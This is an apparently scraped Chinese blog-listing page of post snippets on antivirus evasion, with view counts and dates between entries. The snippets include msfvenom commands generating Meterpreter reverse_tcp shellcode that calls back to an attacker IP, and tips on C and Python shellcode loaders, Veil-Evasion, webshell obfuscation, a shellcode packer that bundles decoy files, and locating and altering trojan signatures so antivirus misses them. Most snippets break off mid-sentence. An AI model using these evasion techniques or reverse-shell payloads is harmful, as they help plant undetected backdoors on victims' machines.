众所周知,目前的杀毒软件的杀毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查杀,其中云查杀的一些特点基本上也可以概括为特征码查杀,不管是哪一种杀毒软件,都会检查PE文件头,尤其是当后门程序越大时,越容易被查杀。 通过C语言编译后门 1.首先使用msfvenom命令生成一句简短的shel
原创 2022-05-23 15:15:32
461阅读
QQ 1285575001Wechat M010527技术交流 QQ群599020441纪年科技aming反病毒安全软件 anti-virus security software三种特点基于特征基于行为基于云查杀 -特征查杀都是特别针对PE头文件的查杀当payload文件越大的时候,特征越容易查杀反制查杀机制 (概括)采取特征与行为分离避免 PE头文...
原创 2021-07-18 20:40:47
1129阅读
在探讨一个权限维持技巧的时候,似...
原创 2023-05-22 12:35:23
310阅读
msfconsole
原创 2022-07-17 00:40:10
142阅读
测试
转载 2012-02-14 07:30:59
335阅读
近日,fortinet截获一种使用python语言编写的勒索软件,并将其命名为 “Fsociety Locker”。之所以命名为“Fsociety Locker”,是因为勒索软件作者是美剧“黑客军团”的粉丝,勒索软件作者使用了“fs0ciety”作为文件加密后的后缀名。 今天我们就对这款勒索软件进行分析。行为特征在win7系统上运行的效果为:1.png (33.05 KB, 下载次数: 99)20
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会/x/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2022-02-28 11:07:56
351阅读
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了先使用msfvenom生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2021-06-29 11:08:00
1086阅读
干货|-C加载器尝试哆啦安全|知识星球上线啦(优惠券活动即将到期)!!!微信公众号
原创 2021-12-14 09:21:43
933阅读
通过代码直接调用System.Management,替代powershell.exe c#代码,保存为1.cs: using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage ...
转载 2021-07-17 23:39:00
1712阅读
2评论
注意:所有测试都需要使用本地Teamserver,都需要在断网环境下测试! 一、veil-Evasion的安装: ①安装docker:apt install docker.io ②拉取镜像:docker pull mattiasohlsson/veil ③启动容器:docker run -it ...
转载 2021-09-08 14:39:00
995阅读
2评论
GoPhantom是一款基于Go语言的红队演练工具,可将Shellcode与诱饵文件打包生成的Windows可执行文件。使用时只需将Shell可通过夸克网盘获取。
生成shellcodemsfvenom -p python/meterpreter/reverse_tcp lhost=192.168.137.44 lport=4444 -f raw -o shell.py环境准备(1)安装Python 2.7 x86 windows版:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msiPS:必须
转载 2021-05-17 10:32:50
519阅读
(一)、应注意的事项:  1.的测试(在线杀毒、杀毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/) 在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被杀了.大家还是把软装在自己的电脑,然后测试比较好.  2.一个好的杀木马要过文件、内存、行为、主动防御等一些专杀软件.  3.目前一些常用的软有
原创 2009-07-25 22:12:58
2366阅读
2评论
一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入, 一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:
转载 2010-02-13 02:48:28
731阅读
webshellphp jsp https://xz.aliyun.com/t/10937https://xz.aliyun.com/t/10989php 传统php变形
原创 2022-04-29 21:48:25
107阅读
使用python一键生成webshell
原创 2023-08-04 19:18:17
1412阅读
源码C++基础 都一样 正常安装就行 有的是这个版本 这三个解压到 覆盖 因为之前安装过了 就看下路径吧 最后 提一下Assist 安装需要 进入那个vc98 目录去 安装破解 如果缺dll 那就下一个加载就ok  
原创 2021-08-16 09:43:41
997阅读
一: 灰鸽子方法大全 在所有的版本中,黑防的鸽子算是比较好做的了,今天在这里,我就用他做案例 一,最经典的OD一半一半定位法 我们把整个黑色标记的区域看成是没有修改的木马代码把它从中间切平均分成两半,把其中的一半用nop 填充掉,再用瑞星内存,如果杀掉了就说明特征代码在我们没有nop 掉的一半,没有到就说明我们刚刚nop的一半中含有特征代码。 所演示的情况是特征代码在没有no
转载 精选 2009-07-15 21:36:01
7809阅读
0x01 前言2019年,...
原创 2023-07-27 22:28:31
0阅读
  • 1
  • 2
  • 3
  • 4
  • 5